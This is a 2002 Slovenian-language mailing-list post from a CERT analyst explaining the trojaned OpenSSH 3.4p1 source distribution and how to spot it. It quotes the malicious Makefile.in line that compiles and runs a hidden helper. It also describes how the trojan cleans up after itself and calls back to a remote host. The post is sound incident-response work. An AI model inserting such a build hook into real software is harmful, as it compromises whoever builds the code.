[LUGOS-SEC] Fwd: openssh-3.4p1.tar.gz distribution recently
trojaned
Gorazd Bozic
gorazd.bozic at arnes.si
Mon Aug 5 14:57:44 CEST 2002
Tadej Kirinchich - Kiri_ wrote:
> ce pa nimas vez .tar.gz pa gres v dir (ce mas odpakiran source na disku) open
> ssh-3.4p1/openbsd-compat , pa nardis cat Makefile.in |grep bf-test.c ....in c
> e ti najde kasno vrstico z tem, ves da mas tistga z trojancem
Ampak samo, ce ga se nisi prevajal. bf-test namrec za seboj pobrise sledove.
bf-test.c se prevede v bf-test, ki napise bf-test.out shell skripto:
Makefile.in:
@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &
bf-test.out naredi conftest.c, nato pa pobrise stvari iz Makefile.in in
Makefile; conftest.c pa se prevede, zazene, ter pobrise z diska.
Conftest se skusa povezati na sistem v Avstraliji (port 6667), ki pa ni bil
"operativen" ze kmalu po odkritju strojanizirane kopije OpenSSH, saj je
AusCERT kmalu vedel za stvar.
Gorazd
--
Gorazd Bozic <gorazd.bozic at arnes.si>
ARNES SI-CERT, Jamova 39 p.p. 7, SI-1001 Ljubljana, Slovenia
tel: +386 1 479 88 22, fax: +386 1 479 88 99
--
Gorazd Bozic <gorazd.bozic at arnes.si>
ARNES SI-CERT, Jamova 39 p.p. 7, SI-1001 Ljubljana, Slovenia
tel: +386 1 479 88 22, fax: +386 1 479 88 99
More information about the lugos-sec
mailing list